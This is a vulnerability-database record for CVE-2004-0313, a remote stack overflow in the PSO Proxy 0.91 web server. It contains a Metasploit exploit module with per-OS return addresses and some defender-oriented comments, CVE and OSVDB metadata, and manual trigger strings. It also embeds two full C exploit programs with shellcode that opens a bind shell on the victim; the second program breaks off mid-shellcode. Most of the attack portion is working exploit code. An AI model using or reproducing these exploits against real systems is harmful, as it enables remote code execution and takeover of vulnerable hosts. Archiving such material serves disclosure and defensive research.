ID PACKETSTORM:83235
Type packetstorm
Reporter Patrick Webster
Modified 2009-11-26T00:00:00
Description
`##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Metasploit exploit module for CVE-2004-0313: stack overflow in the
# PSO Proxy 0.91 web server on Windows (see 'References' below).
# From a defender's perspective this module produces two observable
# artifacts: a bare "GET / HTTP/1.0" banner probe (check) and a single
# request line of ~1.4 KB with no HTTP method or version (exploit).
# Both are easy to flag in proxy logs or an IDS signature.
class Metasploit3 < Msf::Exploit::Remote
# Supplies connect/sock/disconnect and the RPORT datastore option used below.
include Msf::Exploit::Remote::Tcp
# Registers the module metadata (references, payload constraints, per-OS
# return addresses) with the framework and sets the default port to 8080.
def initialize(info = {})
super(update_info(info,
'Name' => 'PSO Proxy v0.91 Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => 'Patrick Webster <patrick@aushack.com>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
# The encoded payload must fit in 370 bytes and avoid NUL, LF, CR and
# space -- presumably the bytes that would terminate or split the request
# line on the server side (not verifiable from this file).
'Space' => 370,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
# Each 'Ret' is a "call ecx" gadget address in ws2help.dll. The value is
# specific to the OS version and language build, so the selected target
# must match the victim; a wrong address only crashes the service (DoS).
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004',
'DefaultTarget' => 0))
# Only the TCP port is configurable; RHOST comes from the Tcp mixin.
register_options(
[
Opt::RPORT(8080),
], self.class)
end
# Returning false opts this module out of the framework's automatic
# target filtering, so it is never selected by automated exploitation
# runs -- presumably because a wrong target is destructive (crash).
def autofilter
false
end
# Active version check: sends a minimal GET and looks for "PSO Proxy 0.9"
# in whatever the server returns within the 3-second read.
# Review notes: the socket opened by `connect` is never released here
# (no `disconnect`/`ensure`), and if `sock.get` yields nil on timeout
# (verify against the Rex stream API) the regex match relies on
# NilClass#=~, which was removed in Ruby 3.2 -- `banner.to_s =~ ...`
# would be safer. Matching only the major/minor version also means any
# 0.9x build reports Vulnerable, not just 0.91.
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
# Builds and sends the overflow request, then hands off to the payload
# handler. Layout: 1024 bytes of random alphanumeric filler (avoiding the
# payload bad chars), the target return address packed as a 4-byte
# little-endian value ('V'), then the encoded payload, terminated by a
# blank line. Note the request carries no HTTP method or version at all,
# which is itself a strong log-side detection signal for this attack.
# Style note: the local `exploit` shadows the method's own name.
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
end
`
{"id": "PACKETSTORM:83235", "type": "packetstorm", "bulletinFamily": "exploit", "title": "PSO Proxy v0.91 Stack Overflow", "description": "", "published": "2009-11-26T00:00:00", "modified": "2009-11-26T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/83235/PSO-Proxy-v0.91-Stack-Overflow.html", "reporter": "Patrick Webster", "references": [], "cvelist": ["CVE-2004-0313"], "lastseen": "2016-12-05T22:23:03", "viewCount": 1, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2016-12-05T22:23:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0313"]}, {"type": "exploitdb", "idList": ["EDB-ID:156", "EDB-ID:23732", "EDB-ID:23734", "EDB-ID:23733", "EDB-ID:16790"]}, {"type": "osvdb", "idList": ["OSVDB:4028"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/PSOPROXY91_OVERFLOW"]}], "modified": "2016-12-05T22:23:03", "rev": 2}, "vulnersScore": 7.9}, "sourceHref": "https://packetstormsecurity.com/files/download/83235/psoproxy91_overflow.rb.txt", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PSO Proxy v0.91 Stack Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the PSO Proxy v0.91 web server. \nIf a client sends an excessively long string the stack is overwritten. 
\n}, \n'Author' => 'Patrick Webster <patrick@aushack.com>', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2004-0313' ], \n[ 'OSVDB', '4028' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/156' ], \n[ 'BID', '9706' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 370, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en. \n[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll \n[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll \n[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll \n[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll \n[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'Feb 20 2004', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \n], self.class) \nend \n \ndef autofilter \nfalse \nend \n \ndef check \nconnect \nsock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\") \nbanner = sock.get(-1,3) \nif (banner =~ /PSO Proxy 0\\.9/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nexploit = rand_text_alphanumeric(1024, payload_badchars) \nexploit += [target['Ret']].pack('V') + payload.encoded \n \nsock.put(exploit + \"\\r\\n\\r\\n\") \n \ndisconnect \nhandler \nend \nend \n`\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "Buffer overflow in PSOProxy 0.91 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP request, as demonstrated using a long (1) GET argument or (2) method name.", "edition": 3, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0313", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0313"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/a:psoproxy:psoproxy_server:0.91"], "id": "CVE-2004-0313", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0313", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:psoproxy:psoproxy_server:0.91:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-0313"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in PSOProxy. The program fails to handle long HTTP GET or method name requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in PSOProxy. The program fails to handle long HTTP GET or method name requests resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause the execution of arbitrary code.\n## Manual Testing Notes\nTo test the vulnerability send to the server a string like:\n\nGET /aaaa[ 942 of a ]aaaa HTTP/1.1\n\nor:\n\nGET aaaa[ 942 of a ]aaaa HTTP/1.1\n\nor:\n\naaaa[ 1035 of a ]aaaa\n\n\n\n\n## References:\nVendor URL: http://psoproxy.sourceforge.net/\n[Secunia Advisory ID:10948](https://secuniaresearch.flexerasoftware.com/advisories/10948/)\nOther Advisory URL: http://marc.theaimsgroup.com/?l=bugtraq&m=107756005123920&w=2\nOther Advisory URL: http://marc.theaimsgroup.com/?l=bugtraq&m=107730731900261&w=2\nKeyword: PSOProxy,Overflow\nISS X-Force ID: 15275\nGeneric Exploit URL: http://www.securityfocus.com/data/vulnerabilities/exploits/pso-exploit.c\nGeneric Exploit URL: http://www.securityfocus.com/data/vulnerabilities/exploits/PSOProxy-exp.c\n[CVE-2004-0313](https://vulners.com/cve/CVE-2004-0313)\nBugtraq ID: 9706\n", "modified": "2004-02-20T09:03:31", "published": "2004-02-20T09:03:31", "href": "https://vulners.com/osvdb/OSVDB:4028", "id": "OSVDB:4028", "type": "osvdb", "title": "PSOProxy Long HTTP Request Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:49:53", "description": "PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP). CVE-2004-0313. 
Remote exploit for windows platform", "published": "2004-02-26T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Exploit Win2k/XP", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-26T00:00:00", "id": "EDB-ID:156", "href": "https://www.exploit-db.com/exploits/156/", "sourceData": "/*\r\n\r\n\t Copyright \u00a9 Rosiello Security\r\n\r\n \t http www rosiello org\r\n \t ================\r\n\r\n -== Remote Exploit for PSOProxy version v0.91 ==--\r\n Code by: rave\r\n Contact: rave@rosiello.org\r\n Date: Feb 2004\r\n Bug found by: Donato Ferrante\r\n\r\n There is a vulnerability found in the PSOProxy server.\r\n An attacker can execute arbitrary code exploiting remotely a buffer overflow.\r\n\r\n\tThe exploit sends:\r\n\r\n GET / <1021 x A><adres of the shellcode><shellcode>\r\n\r\n This spawns a bindshell on the victim at port 28876..\r\n\r\n\r\n Usage <C:\\>psoproxy-exploit.exe <target host> <target number>\r\n Target Number Target Name Stack Adress\r\n ============= =========== ===========\r\n 0 Demo 0xBADC0DED\r\n 1 Windows XP Home Edtion SP1. 0x00D2FDDA\r\n 2 Windows XP Pro Edtion SP1. 0x00EDFDDC\r\n 3 Win2k Pro Edtion. 0x00BBFDDC\r\n\r\n\r\n\r\n <C:\\> psoproxy-exploit localhost 1\r\n [+] Winsock Inalized\r\n [+] Trying to connect to localhost:8080\r\n [+] socket inalized\r\n [+] Overflowing string is Prepared\r\n [+] Connected.\r\n [+] Overflowing string had been send\r\n\r\n\r\n <C:\\> telnet localhost 28876\r\n Microsoft Windows XP [versie 5.1.2600]\r\n (C) Copyright 1985-2001 Microsoft Corp.\r\n\r\n <D:\\>\r\n\r\n DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!\r\n Respect the law as we do!\r\n\r\n\r\n\r\n\r\n Special Tankz to:\r\n opy { win2k 0wnage !! 
ty for lending me ur box }\r\n B0f { Hope to work with u again in the futhure like we do all the time }\r\n Dragnet { Always willing to help me out }\r\n Angelo { Verry good maffio`so }\r\n\r\n\r\n Greetz go out to:\r\n Kajun { Verry suportive guy }\r\n NrAziz { 0wns pakistan hax0r scene ! beware always say mr NrAziz }\r\n sloth { good guy }\r\n Mercy { Hope to see u soon }\r\n Netric security {www.netric.org/.de }\r\n [+] All the hax0rs i forgot.\r\n\r\n Hate Messages:\r\n Ziphie { U didnt get mine bitch }\r\n\r\n OOh and Li0n7 voila fr {\r\n you're doing it all wrong, your exploit doesn't work!\r\n http://www.securityfocus.com/archive/1/354769/2004-02-15/2004-02-21/0\r\n k/j man, keep on doing the good stuff and next time add some more stack adresses so\r\n it would work on other os`s...\r\n\r\n }\r\n\r\n\r\n\r\nAdvisory at: http://www.rosiello.org/en/read_bugs.php?15\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <errno.h>\r\n#include <windows.h>\r\n\r\n// Darn fucking 1337 macro shit\r\n#define ISIP(m) (!(inet_addr(m) ==-1))\r\n\r\n#define offset 1024 //1024\r\n\r\n\r\n\r\n\r\n\r\nstruct remote_targets {\r\n char *os;\r\n unsigned long sh_addr;\r\n} target [] ={\r\n/* Option`s for your eyes only :D*/\r\n \"Demo \",\r\n 0xbadc0ded,\r\n\r\n\r\n \"Windows XP Home Edtion SP1. \",\r\n 0x00D2FDDA,\r\n\r\n \"Windows XP Pro Edtion SP1. \",\r\n 0x00edfddc,\r\n\r\n\r\n \"Win2k Pro Edtion. 
\",\r\n 0x00bbfddc,\r\n\r\n };\r\n\r\n\r\n\r\n\r\n\r\n\r\n//Bindcode spawns a binshell on port 28876 (Thanks to metasploit.com guys)\r\nunsigned char shellcode[] =\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\"\r\n \"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\"\r\n \"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\"\r\n \"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\"\r\n \"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\"\r\n \"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\"\r\n \"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\"\r\n \"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\"\r\n \"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\"\r\n \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\"\r\n \"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\"\r\n \"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\"\r\n \"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x60\"\r\n \"\\x6a\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x23\\xff\\xff\\xff\\x89\"\r\n \"\\xc6\\x31\\xdb\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x31\\xdb\\x56\\x56\"\r\n \"\\x56\\x53\\x53\\x31\\xc0\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\"\r\n \"\\x53\\x53\\x53\\x6a\\x44\\x89\\xe0\\x53\\x53\\x53\\x53\\x54\\x50\\x53\\x53\\x53\"\r\n \"\\x43\\x53\\x4b\\x53\\x53\\x51\\x53\\x87\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xdf\"\r\n \"\\xfe\\xff\\xff\\x5b\\x31\\xc0\\x48\\x50\\x53\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xcf\"\r\n 
\"\\xfe\\xff\\xff\\x56\\x87\\xef\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc2\\xfe\\xff\\xff\"\r\n \"\\x83\\xc4\\x5c\\x61\\xeb\\x89\\x41\";\r\n\r\n\r\n// now what would this button do ?\r\nchar *host_ip;\r\nu_long get_ip(char *hostname)\r\n{\r\n struct hostent *hp;\r\n\r\n if (ISIP(hostname)) return inet_addr(hostname);\r\n\r\n if ((hp = gethostbyname(hostname))==NULL)\r\n { perror (\"[+] gethostbyname() failed check the existance of the host.\\n\");\r\n exit(-1); }\r\n\r\n return (inet_ntoa(*((struct in_addr *)hp->h_addr)));\r\n}\r\n\r\n\r\n/// oooh yeah uuuh right ....\r\nint usage (char *what)\r\n{\r\n int i;\r\n fprintf(stdout,\"Copyright \u00a9 Rosiello Security\\n\");\r\n fprintf(stdout,\"http://www.rosiello.org\\n\\n\");\r\n fprintf(stdout,\"Usage %s <target host> <target number>\\n\",what);\r\n fprintf(stdout,\"Target Number\\t\\tTarget Name\\t\\t\\t\\tStack Adress\\n\");\r\n fprintf(stdout,\"=============\\t\\t===========\\t\\t\\t\\t===========\\n\");\r\n\r\n for (i=0;i < 4;i++)\r\n fprintf(stdout,\"%d\\t\\t\\t%s\\t\\t0x%p\\n\",i,target[i].os,target[i].sh_addr);\r\n\r\n exit(0);\r\n}\r\n\r\nint main(int argc,char **argv)\r\n\r\n{\r\n\r\n\r\nchar buffer[offset*2]=\"get /\",*ptr,*address;\r\nint sd,oops,i,choise;\r\nstruct sockaddr_in ooh;\r\n\r\n\r\nWSADATA wsadata;\r\nWSAStartup(0x101, &wsadata);\r\n\r\nif (argc < 2) usage(argv[0]);\r\naddress=argv[1];\r\nchoise=atoi(argv[2]);\r\n\r\nfprintf(stdout,\"[+] Winsock Inalized\\n\");\r\n\r\n /* Lets start making a litle setup\r\n Change the port if you have to */\r\n\r\n ooh.sin_addr.s_addr = inet_addr(get_ip(address));\r\n ooh.sin_port = htons(8080);\r\n ooh.sin_family = AF_INET;\r\n\r\n\r\nfprintf(stdout,\"[+] Trying to connect to %s:%d\\n\",address,8080);\r\n\r\n\r\n// ok ok here`s ur sock()\r\nsd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);\r\n if (!sd<0) { fprintf(stderr,\"[!] 
socket() failed.\\n\");exit (-1); }\r\n\r\n fprintf(stdout,\"[+] socket inalized\\n\");\r\n\r\n\r\n /* initializing the expploiting buffer, read the file comments for the details */\r\nptr=buffer+strlen(buffer);\r\n\r\nfor (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x2e;\r\nfor (i=strlen(buffer);i < offset+6;i++) { *ptr++=(char)0xa; *ptr++=(char)0xd ;}\r\n\r\nmemcpy(buffer+strlen(buffer),((char *)&shellcode),strlen(shellcode));\r\nmemcpy(buffer+offset,((char *)&target[choise].sh_addr),3);\r\n\r\n\r\nfprintf(stdout,\"[+] Overflowing string is Prepared\\n\");\r\n\r\n // Knock knock ... hi i want to hook up with you\r\n oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));\r\n if(oops!=0) { fprintf(stderr,\"[!] connect() failed.\\n\"); exit(-1); }\r\n\r\n// yep we are in :D\r\nfprintf(stdout,\"[+] Connected.\\n\");\r\n\r\n\r\n// Sending some Dangerous stuff\r\ni = send(sd,buffer,strlen(buffer),0);\r\nif (!i <0) { fprintf (stdout,\"[!] Send() failed\\n\"); exit (-1) ; }\r\n\r\nfprintf(stdout,\"[+] Overflowing string had been send\\n\");\r\n\r\n\r\n/* May psoproxy rest in peace (have cold a nice one and telnet to <host> 28876\r\n\r\n <C:\\> telnet localhost 28876\r\n Microsoft Windows XP [versie 5.1.2600]\r\n (C) Copyright 1985-2001 Microsoft Corp.\r\n\r\n D:\\>\r\n*/\r\n\r\n\r\n// the cleaners !!\r\nWSACleanup();\r\n\r\n// [EOF]\r\nreturn 0;\r\n\r\n}\r\n\r\n// milw0rm.com [2004-02-26]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/156/"}, {"lastseen": "2016-02-02T21:40:48", "description": "PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1). CVE-2004-0313. 
Remote exploit for windows platform", "published": "2004-02-20T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-20T00:00:00", "id": "EDB-ID:23732", "href": "https://www.exploit-db.com/exploits/23732/", "sourceData": "source: http://www.securityfocus.com/bid/9706/info\r\n\r\nIt has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.\r\n\r\nA malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. \r\n\r\n/*\r\n** Voici mon 1er exploit, il traite d'une faille dans le programme PSOProxy v0.91\r\n** Il s'agit d'un buffer overflow type et facile a faire (c pour <E7>a que j'ai r<E9>ussi ^^)\r\n**\r\n** Pour des infos tecniques aller ici : http://seclists.org/lists/bugtraq/2004/Feb/0567.html\r\n**\r\n** Sinon l'exploit consiste en : 1. on ce connecte au pc distnant\r\n** 2. on envoit le code malicieux\r\n** 3. 
un shell souvre sur le port 4444\r\n** Teste sous xp sp1.\r\n**\r\n**\r\n** Merci a Vendame qui m'as d<E9>bloqu<E9> et a CRPT.\r\n**\r\n** Merci aussi a ceux qui font pas chier et qui se prenne pas pour dieux.\r\n**\r\n** ps : prochaine version bientot disponible.\r\n** ps2 : j'ai bien comment<E9> le code pour que ceux qui veulent apprendre apprennent\r\n** ps3 : Je ne cherche qu'<E0> m'am<E9>lior<E9>, alors si vous avez des sugestions, des modifications,\r\n** je suis la pour les recevoir :).\r\n**\r\n** Coded By PaLbOsA\r\n*/\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <windows.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\nvoid intro(){\r\n printf(\"***************************************************\\n\");\r\n printf(\"* PSOProxy v0.91 Exploit *\\n\");\r\n printf(\"* Coded By PaLbOsA *\\n\");\r\n printf(\"* *\\n\");\r\n printf(\"* C mon premier exploit, alors soyez indulgent :) *\\n\");\r\n printf(\"* *\\n\");\r\n printf(\"* Un grand Merci a vendame et a CRPT. 
*\\n\");\r\n printf(\"***************************************************\\n\");\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\r\nchar buffer[3000]; // on prend un bon gros buffer :>\r\n\r\nchar ip[30]; // a ton avis?\r\n\r\nchar shellcode[]= // Ouvre le port 4444 en <E9>coute\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\"\r\n \"\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\"\r\n \"\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\"\r\n \"\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\"\r\n \"\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\"\r\n \"\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\"\r\n \"\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\"\r\n \"\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\"\r\n 
\"\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\"\r\n \"\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\"\r\n \"\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\"\r\n \"\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\"\r\n \"\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\"\r\n \"\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\"\r\n \"\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\"\r\n \"\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\"\r\n 